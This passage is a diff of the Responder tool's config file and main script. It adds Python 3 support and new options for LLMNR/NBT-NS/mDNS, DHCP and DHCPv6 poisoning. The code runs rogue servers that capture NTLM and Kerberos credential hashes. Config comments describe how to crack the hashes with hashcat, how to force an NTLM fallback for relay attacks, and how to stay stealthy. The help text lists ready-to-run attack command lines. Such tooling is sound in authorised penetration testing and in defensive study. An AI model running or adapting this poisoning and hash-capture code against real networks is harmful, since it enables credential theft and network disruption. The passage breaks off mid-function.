+SQL      = On
+SMB      = On
+QUIC     = On
+RDP      = On
+Kerberos = On
+FTP      = On
+POP      = On
+SMTP     = On
+IMAP     = On
+HTTP     = On
+HTTPS    = On
+DNS      = On
+LDAP     = On
+DCERPC   = On
+WINRM    = On
+SNMP     = On
+MQTT     = On
+MYSQL    = On 
+
+; Custom challenge.
+; Use "Random" for generating a random challenge for each requests (Default)
+Challenge = Random
 
 ; SQLite Database file
 ; Delete this file to re-capture previously captured hashes
@@ -33,23 +49,29 @@ AnalyzeLog = Analyzer-Session.log
 ResponderConfigDump = Config-Responder.log
 
 ; Specific IP Addresses to respond to (default = All)
-; Example: RespondTo = 10.20.1.100-150, 10.20.3.10
+; Example: RespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334
 RespondTo =
 
 ; Specific NBT-NS/LLMNR names to respond to (default = All)
 ; Example: RespondTo = WPAD, DEV, PROD, SQLINT
+;RespondToName = WPAD, DEV, PROD, SQLINT
 RespondToName = 
 
 ; Specific IP Addresses not to respond to (default = None)
-; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
+; Hosts with IPv4 and IPv6 addresses must have both addresses included to prevent responding.
+; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334
 DontRespondTo = 
 
 ; Specific NBT-NS/LLMNR names not to respond to (default = None)
-; Example: DontRespondTo = NAC, IPS, IDS
-DontRespondToName =
+; Example: DontRespondToName = NAC, IPS, IDS
+DontRespondToName = ISATAP
+
+; MDNS TLD not to respond to (default = _dosvc). Do not add the ".", only the TLD.
+; Example: DontRespondToTLD = _dosvc, _blasvc, etc
+DontRespondToTLD = _dosvc
 
 ; If set to On, we will stop answering further requests from a host
-; if a hash hash been previously captured for this host.
+; if a hash has been previously captured for this host.
 AutoIgnoreAfterSuccess = Off
 
 ; If set to On, we will send ACCOUNT_DISABLED when the client tries
@@ -57,6 +79,63 @@ AutoIgnoreAfterSuccess = Off
 ; This may break file serving and is useful only for hash capture
 CaptureMultipleCredentials = On
 
+; If set to On, we will write to file all hashes captured from the same host.
+; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto,
+; domain\popo, domain\zozo. Recommended value: On, capture everything.
+CaptureMultipleHashFromSameHost = On
+
+;IPv6 section
+[DHCPv6 Server]
+
+; Domain to filter DNS and DHCPv6 poisoning responses
+; Only respond to clients in this domain
+; Leave empty to poison all domains (NOT RECOMMENDED - causes network disruption)
+; Example: corp.local
+DHCPv6_Domain = 
+
+; Send Router Advertisements to speed up IPv6 configuration
+; Only needed on networks without RA Guard protection
+; Default: Off (more stealthy, waits for natural DHCPv6 SOLICIT)
+; WARNING: Sending RA can be more detectable
+SendRA = Off
+
+; Specific IPv6 address to bind to and advertise as DNS server
+; Leave empty to auto-detect link-local address (recommended)
+; Example: fe80::1
+; Example: 2001:db8::1
+BindToIPv6 = 
+
+[Kerberos]
+; ======================================================
+; Kerberos Operation Mode (NEW FEATURE)
+; ======================================================
+;
+; CAPTURE (default) - Capture Kerberos AS-REP hashes
+;   - Responds with KDC_ERR_PREAUTH_REQUIRED
+;   - Client sends encrypted timestamp
+;   - Responder captures AS-REP hash
+;   - Crack with: hashcat -m 7500
+;   - Good for: Stealthy operation, unique Kerberos hashes
+;
+; FORCE_NTLM - Force client to fall back to NTLM
+;   - Responds with KDC_ERR_ETYPE_NOSUPP
+;   - Client abandons Kerberos, tries NTLM
+;   - Responder's SMB/HTTP captures NetNTLMv2
+;   - Crack with: hashcat -m 5600
+;   - Good for: Relay attacks, faster cracking
+;
+; Choose based on engagement needs:
+; - Use CAPTURE for stealth and Kerberos-specific hashes
+; - Use FORCE_NTLM for relay attacks or faster cracking
+;
+; Default: CAPTURE (if not specified)
+; ======================================================
+
+KerberosMode = CAPTURE
+
+; Alternative: Force NTLM fallback
+;KerberosMode = FORCE_NTLM
+
 [HTTP Server]
 
 ; Set to On to always serve the custom EXE
@@ -73,18 +152,18 @@ Serve-Html = Off
 HtmlFilename = files/AccessDenied.html
 
 ; Custom EXE File to serve
-ExeFilename = files/BindShell.exe
+ExeFilename = ;files/filetoserve.exe
 
 ; Name of the downloaded .exe that the client will see
 ExeDownloadName = ProxyClient.exe
 
 ; Custom WPAD Script
-WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY RespProxySrv:3128; PROXY RespProxySrv:3141; DIRECT';}
+; Only set one if you really know what you're doing. Responder is taking care of that and inject the right one, with your current IP address.
+WPADScript =
 
 ; HTML answer to inject in HTTP responses (before </body> tag).
-; Set to an empty string to disable.
-; In this example, we redirect make users' browsers issue a request to our rogue SMB server.
-HTMLToInject = <img src='file://RespProxySrv/pictures/logo.jpg' alt='Loading' height='1' width='1'>
+; leave empty if you want to use the default one (redirect to SMB on your IP address).
+HTMLToInject =
 
 [HTTPS Server]
 

Responder.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
@@ -14,40 +14,306 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import asyncio
 import optparse
 import ssl
-
-from SocketServer import TCPServer, UDPServer, ThreadingMixIn
+try:
+	from SocketServer import TCPServer, UDPServer, ThreadingMixIn
+except:
+	from socketserver import TCPServer, UDPServer, ThreadingMixIn
 from threading import Thread
 from utils import *
-
+import struct
 banner()
 
-parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
-parser.add_option('-A','--analyze',        action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
-parser.add_option('-I','--interface',      action="store",      help="Network interface to use", dest="Interface", metavar="eth0", default=None)
-parser.add_option('-i','--ip',      action="store",      help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
-parser.add_option('-b', '--basic',         action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
-parser.add_option('-r', '--wredir',        action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
-parser.add_option('-d', '--NBTNSdomain',   action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
-parser.add_option('-f','--fingerprint',    action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
-parser.add_option('-w','--wpad',           action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
-parser.add_option('-u','--upstream-proxy', action="store",      help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
-parser.add_option('-F','--ForceWpadAuth',  action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
+import optparse
+import textwrap
 
-parser.add_option('-P','--ProxyAuth',       action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False)
+class ResponderHelpFormatter(optparse.IndentedHelpFormatter):
+    """Custom formatter for better help output"""
+    
+    def format_description(self, description):
+        if description:
+            return description + "\n"
+        return ""
+    
+    def format_epilog(self, epilog):
+        if epilog:
+            return "\n" + epilog + "\n"
+        return ""
 
-parser.add_option('--lm',                  action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
-parser.add_option('-v','--verbose',        action="store_true", help="Increase verbosity.", dest="Verbose")
+def create_parser():
+    """Create argument parser with organized option groups"""
+    
+    usage = textwrap.dedent("""\
+        python3 %prog -I eth0 -v""")
+    
+    description = textwrap.dedent("""\
+    ══════════════════════════════════════════════════════════════════════════════
+      Responder - LLMNR/NBT-NS/mDNS Poisoner and Rogue Authentication Servers
+    ══════════════════════════════════════════════════════════════════════════════
+    Captures credentials by responding to broadcast/multicast name resolution,
+    DHCP, DHCPv6 requests
+    ══════════════════════════════════════════════════════════════════════════════""")
+    
+    epilog = textwrap.dedent("""\
+    ══════════════════════════════════════════════════════════════════════════════
+      Examples:
+    ══════════════════════════════════════════════════════════════════════════════
+      Basic poisoning:            python3 Responder.py -I eth0 -v
+      
+      ##Watch what's going on:
+      Analyze mode (passive):     python3 Responder.py -I eth0 -Av
+
+      ##Working on old networks:
+      WPAD with forced auth:      python3 Responder.py -I eth0 -wFv
+
+      ##Great module:
+      Proxy auth:                 python3 Responder.py -I eth0 -Pv
+
+      ##DHCPv6 + Proxy authentication:
+      DHCPv6 attack:              python3 Responder.py -I eth0 --dhcpv6 -vP
+
+      ##DHCP -> WPAD injection -> Proxy authentication:
+      DHCP + WPAD injection:      python3 Responder.py -I eth0 -Pvd
+
+      ##Poison requests to an arbitrary IP:
+      Poison with external IP:    python3 Responder.py -I eth0 -e 10.0.0.100
+
+      ##Poison requests to an arbitrary IPv6 IP:
+      Poison with external IPv6:  python3 Responder.py -I eth0 -6 2800:ac:4000:8f9e:c5eb:2193:71:1d12
+    ══════════════════════════════════════════════════════════════════════════════
+      For more info: https://github.com/lgandx/Responder/blob/master/README.md
+    ══════════════════════════════════════════════════════════════════════════════""")
+    
+    parser = optparse.OptionParser(
+        usage=usage,
+        version=settings.__version__,
+        prog="Responder.py",
+        description=description,
+        epilog=epilog,
+        formatter=ResponderHelpFormatter()
+    )
+    
+    # -------------------------------------------------------------------------
+    # REQUIRED OPTIONS
+    # -------------------------------------------------------------------------
+    required = optparse.OptionGroup(parser, 
+        "Required Options",
+        "These options must be specified")
+    
+    required.add_option('-I', '--interface',
+        action="store",
+        dest="Interface",
+        metavar="eth0",
+        default=None,
+        help="Network interface to use. Use 'ALL' for all interfaces.")
+    
+    parser.add_option_group(required)
+    
+    # -------------------------------------------------------------------------
+    # POISONING OPTIONS
+    # -------------------------------------------------------------------------
+    poisoning = optparse.OptionGroup(parser,
+        "Poisoning Options", 
+        "Control how Responder poisons name resolution requests")
+    
+    poisoning.add_option('-A', '--analyze',
+        action="store_true",
+        dest="Analyze",
+        default=False,
+        help="Analyze mode. See requests without poisoning. (passive)")
+    
+    poisoning.add_option('-e', '--externalip',
+        action="store",
+        dest="ExternalIP",
+        metavar="IP",
+        default=None,
+        help="Poison with a different IPv4 address than Responder's.")
+    
+    poisoning.add_option('-6', '--externalip6',
+        action="store",
+        dest="ExternalIP6",
+        metavar="IPv6",
+        default=None,
+        help="Poison with a different IPv6 address than Responder's.")
+    
+    poisoning.add_option('--rdnss',
+        action="store_true",
+        dest="RDNSS_On_Off",
+        default=False,
+        help="Poison via Router Advertisements with RDNSS. Sets attacker as IPv6 DNS.")
+    
+    poisoning.add_option('--dnssl',
+        action="store",
+        dest="DNSSL_Domain",
+        metavar="DOMAIN",
+        default=None,
+        help="Poison via Router Advertisements with DNSSL. Injects DNS search suffix.")
+    
+    poisoning.add_option('-t', '--ttl',
+        action="store",
+        dest="TTL",
+        metavar="HEX",
+        default=None,
+        help="Set TTL for poisoned answers. Hex value (30s = 1e) or 'random'.")
+    
+    poisoning.add_option('-N', '--AnswerName',
+        action="store",
+        dest="AnswerName",
+        metavar="NAME",
+        default=None,
+        help="Canonical name in LLMNR answers. (for Kerberos relay over HTTP)")
+    
+    parser.add_option_group(poisoning)
+    
+    # -------------------------------------------------------------------------
+    # DHCP OPTIONS
+    # -------------------------------------------------------------------------
+    dhcp = optparse.OptionGroup(parser,
+        "DHCP Options",
+        "DHCP and DHCPv6 poisoning attacks")
+    
+    dhcp.add_option('-d', '--DHCP',
+        action="store_true",
+        dest="DHCP_On_Off",
+        default=False,
+        help="Enable DHCPv4 poisoning. Injects WPAD in DHCP responses.")
+    
+    dhcp.add_option('-D', '--DHCP-DNS',
+        action="store_true",
+        dest="DHCP_DNS",
+        default=False,
+        help="Inject DNS server (not WPAD) in DHCPv4 responses.")
+    
+    dhcp.add_option('--dhcpv6',
+        action="store_true",
+        dest="DHCPv6_On_Off",
+        default=False,
+        help="Enable DHCPv6 poisoning. WARNING: May disrupt network.")
+    
+    parser.add_option_group(dhcp)
+    
+    # -------------------------------------------------------------------------
+    # WPAD / PROXY OPTIONS
+    # -------------------------------------------------------------------------
+    wpad = optparse.OptionGroup(parser,
+        "WPAD / Proxy Options",
+        "Web Proxy Auto-Discovery attacks")
+    
+    wpad.add_option('-w', '--wpad',
+        action="store_true",
+        dest="WPAD_On_Off",
+        default=False,
+        help="Start WPAD rogue proxy server.")
+    
+    wpad.add_option('-F', '--ForceWpadAuth',
+        action="store_true",
+        dest="Force_WPAD_Auth",
+        default=False,
+        help="Force NTLM/Basic auth on wpad.dat retrieval. (may show prompt)")
+    
+    wpad.add_option('-P', '--ProxyAuth',
+        action="store_true",
+        dest="ProxyAuth_On_Off",
+        default=False,
+        help="Force proxy authentication. Highly effective. (can't use with -w)")
+    
+    wpad.add_option('-u', '--upstream-proxy',
+        action="store",
+        dest="Upstream_Proxy",
+        metavar="HOST:PORT",
+        default=None,
+        help="Upstream proxy for rogue WPAD proxy outgoing requests.")
+    
+    parser.add_option_group(wpad)
+    
+    # -------------------------------------------------------------------------
+    # AUTHENTICATION OPTIONS  
+    # -------------------------------------------------------------------------
+    auth = optparse.OptionGroup(parser,
+        "Authentication Options",
+        "Control authentication methods and downgrades")
+    
+    auth.add_option('-b', '--basic',
+        action="store_true",
+        dest="Basic",
+        default=False,
+        help="Return HTTP Basic auth instead of NTLM. (cleartext passwords)")
+    
+    auth.add_option('--lm',
+        action="store_true",
+        dest="LM_On_Off",
+        default=False,
+        help="Force LM hashing downgrade. (for Windows XP/2003)")
+    
+    auth.add_option('--disable-ess',
+        action="store_true",
+        dest="NOESS_On_Off",
+        default=False,
+        help="Disable Extended Session Security. (NTLMv1 downgrade)")
+    
+    auth.add_option('-E', '--ErrorCode',
+        action="store_true",
+        dest="ErrorCode",
+        default=False,
+        help="Return STATUS_LOGON_FAILURE. (enables WebDAV auth capture)")
+    
+    parser.add_option_group(auth)
+    
+    # -------------------------------------------------------------------------
+    # OUTPUT OPTIONS
+    # -------------------------------------------------------------------------
+    output = optparse.OptionGroup(parser,
+        "Output Options",
+        "Control verbosity and logging")
+    
+    output.add_option('-v', '--verbose',
+        action="store_true",
+        dest="Verbose",
+        default=False,
+        help="Increase verbosity. (recommended)")
+    
+    output.add_option('-Q', '--quiet',
+        action="store_true",
+        dest="Quiet",
+        default=False,
+        help="Quiet mode. Minimal output from poisoners.")
+    
+    parser.add_option_group(output)
+    
+    # -------------------------------------------------------------------------
+    # PLATFORM OPTIONS
+    # -------------------------------------------------------------------------
+    platform = optparse.OptionGroup(parser,
+        "Platform Options",
+        "OS-specific settings")
+    
+    platform.add_option('-i', '--ip',
+        action="store",
+        dest="OURIP",
+        metavar="IP",
+        default=None,
+        help="Local IP to use. (OSX only)")
+    
+    parser.add_option_group(platform)
+    
+    return parser
+
+parser = create_parser()
 options, args = parser.parse_args()
 
 if not os.geteuid() == 0:
-    print color("[!] Responder must be run as root.")
+    print(color("[!] Responder must be run as root."))
     sys.exit(-1)
-elif options.OURIP is None and IsOsX() is True:
-    print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n"
+elif options.OURIP == None and IsOsX() == True:
+    print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n")
     parser.print_help()
     exit(-1)
+    
+elif options.ProxyAuth_On_Off and options.WPAD_On_Off:
+    print("\n\033[1m\033[31mYou cannot use WPAD server and Proxy_Auth server at the same time, choose one of them.\033[0m\n")
+    exit(-1)
 
 settings.init()
 settings.Config.populate(options)
@@ -56,14 +322,26 @@ StartupMessage()
 
 settings.Config.ExpandIPRanges()
 
-if settings.Config.AnalyzeMode:
-	print color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
+#Create the DB, before we start Responder.
+CreateResponderDb()
+
+Have_IPv6 = settings.Config.IPv6
 
 class ThreadingUDPServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
 			except:
 				pass
 		UDPServer.server_bind(self)
@@ -72,198 +350,401 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
 	def server_bind(self):
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
 			except:
 				pass
 		TCPServer.server_bind(self)
 
+class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
+	def server_bind(self):
+		if OsInterfaceIsSupported():
+			try:
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+			except:
+				pass
+		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
+		TCPServer.server_bind(self)
+	
+class ThreadingUDPDHCPv6Server(ThreadingMixIn, UDPServer):
+	allow_reuse_address = True
+	address_family = socket.AF_INET6
+	
+	def server_bind(self):
+		import socket
+		import struct
+		
+		# Bind to :: (accept packets to ANY address including multicast)
+		UDPServer.server_bind(self)
+		
+		print(color("[DHCPv6] Make sure to review DHCPv6 settings Responder.conf\n[DHCPv6] Only run this module for short periods of time, you might cause some disruption.", 2, 1))
+		
+		# Join multicast group
+		group = socket.inet_pton(socket.AF_INET6, 'ff02::1:2')
+		if_index = socket.if_nametoindex(settings.Config.Interface)
+		mreq = group + struct.pack('@I', if_index)
+		
+		try:
+			self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
+			self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_LOOP, 1)
+			print(color("[DHCPv6] Joined ff02::1:2 port 547 on %s" % settings.Config.Interface, 2, 1))
+		except Exception as e:
+			print(color("[!] Multicast join failed: %s" % str(e), 1, 1))
+
+# Set address family to IPv6
+ThreadingUDPDHCPv6Server.address_family = socket.AF_INET6
+
 class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
 		MADDR = "224.0.0.251"
-		
+		MADDR6 = 'ff02::fb'
 		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
 		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
-		
 		Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
 
+		#IPV6:
+		if (sys.version_info > (3, 0)):
+			if Have_IPv6:
+				mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
+				self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
+		else:
+			if Have_IPv6:
+				mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
+				self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
 			except:
 				pass
 		UDPServer.server_bind(self)
 
 class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
 	def server_bind(self):
-		MADDR = "224.0.0.252"
-
+		MADDR  = '224.0.0.252'
+		MADDR6 = 'FF02:0:0:0:0:0:1:3'
 		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
-		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
-		
+		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)		
 		Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
-		
+
+		#IPV6:
+		if Have_IPv6:
+			mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface))
+			self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
 		if OsInterfaceIsSupported():
 			try:
-				self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
+				if settings.Config.Bind_To_ALL:
+					pass
+				else:
+					if (sys.version_info > (3, 0)):
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8'))
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
+					else:
+						self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
+						if Have_IPv6:
+							self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False)
 			except:
 				pass
 		UDPServer.server_bind(self)
+		
 
 ThreadingUDPServer.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingUDPServer.address_family = socket.AF_INET6
+
 ThreadingTCPServer.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingTCPServer.address_family = socket.AF_INET6
+
 ThreadingUDPMDNSServer.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingUDPMDNSServer.address_family = socket.AF_INET6
+
 ThreadingUDPLLMNRServer.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingUDPLLMNRServer.address_family = socket.AF_INET6
+
+ThreadingTCPServerAuth.allow_reuse_address = 1
+if Have_IPv6:
+	ThreadingTCPServerAuth.address_family = socket.AF_INET6
 
 def serve_thread_udp_broadcast(host, port, handler):
 	try:
 		server = ThreadingUDPServer(('', port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_NBTNS_poisoner(host, port, handler):
-	serve_thread_udp_broadcast(host, port, handler)
+	serve_thread_udp_broadcast('', port, handler)
 
 def serve_MDNS_poisoner(host, port, handler):
 	try:
-		server = ThreadingUDPMDNSServer((host, port), handler)
+		server = ThreadingUDPMDNSServer(('', port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_LLMNR_poisoner(host, port, handler):
 	try:
-		server = ThreadingUDPLLMNRServer((host, port), handler)
+		server = ThreadingUDPLLMNRServer(('', port), handler)
 		server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
-
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
+		
 def serve_thread_udp(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
-			server = ThreadingUDPServer((settings.Config.Bind_To, port), handler)
+			server = ThreadingUDPServer(('', port), handler)
 			server.serve_forever()
 		else:
-			server = ThreadingUDPServer((host, port), handler)
+			server = ThreadingUDPServer(('', port), handler)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.")
 
+def serve_thread_dhcpv6(host, port, handler):
+	try:
+		# MUST bind to :: to receive multicast packets
+		server = ThreadingUDPDHCPv6Server(('::', port), handler)
+		server.serve_forever()
+	except Exception as e:
+		print(color("[!] DHCPv6 error: %s" % str(e), 1, 1))
+		
 def serve_thread_tcp(host, port, handler):
 	try:
 		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
+			server = ThreadingTCPServer(('', port), handler)
 			server.serve_forever()
 		else:
-			server = ThreadingTCPServer((host, port), handler)
+			server = ThreadingTCPServer(('', port), handler)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")
+
+def serve_thread_tcp_auth(host, port, handler):
+	try:
+		if OsInterfaceIsSupported():
+			server = ThreadingTCPServerAuth(('', port), handler)
+			server.serve_forever()
+		else:
+			server = ThreadingTCPServerAuth(('', port), handler)
+			server.serve_forever()
+	except:
+		print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.")
 
 def serve_thread_SSL(host, port, handler):
 	try:
 
 		cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
 		key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
-
+		context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+		context.load_cert_chain(cert, key)
 		if OsInterfaceIsSupported():
-			server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
-			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
+			server = ThreadingTCPServer(('', port), handler)
+			server.socket = context.wrap_socket(server.socket, server_side=True)
 			server.serve_forever()
 		else:
-			server = ThreadingTCPServer((host, port), handler)
-			server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
+			server = ThreadingTCPServer(('', port), handler)
+			server.socket = context.wrap_socket(server.socket, server_side=True)
 			server.serve_forever()
 	except:
-		print color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running."
+		print(color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running.")
+
 
 def main():
 	try:
+		if (sys.version_info < (3, 0)):
+			print(color('\n\n[-]', 3, 1) + " Still using python 2? :(")
+		print(color('\n[+]', 2, 1) + " Listening for events...\n")
+
 		threads = []
+        #IPv6 Poisoning
+		# DHCPv6 Server (disabled by default, enable with --dhcpv6)
+		if settings.Config.DHCPv6_On_Off:
+		    from servers.DHCPv6 import DHCPv6
+		    threads.append(Thread(target=serve_thread_dhcpv6, args=('', 547, DHCPv6,)))
 
-		# Load (M)DNS, NBNS and LLMNR Poisoners
-		from poisoners.LLMNR import LLMNR
-		from poisoners.NBTNS import NBTNS
-		from poisoners.MDNS import MDNS
-		threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,)))
-		threads.append(Thread(target=serve_MDNS_poisoner,  args=('', 5353, MDNS,)))
-		threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137,  NBTNS,)))
+		if settings.Config.RDNSS_On_Off or settings.Config.DNSSL_Domain:
+		    from poisoners.RDNSS import RDNSS
+		    threads.append(Thread(target=RDNSS, args=(
+        settings.Config.Interface,      # 1. interface
+        settings.Config.RDNSS_On_Off,   # 2. rdnss_enabled (bool) 
+        settings.Config.DNSSL_Domain    # 3. dnssl_domain (str or None)
+    )))
+			    
+		# Load MDNS, NBNS and LLMNR Poisoners
+		if settings.Config.LLMNR_On_Off:
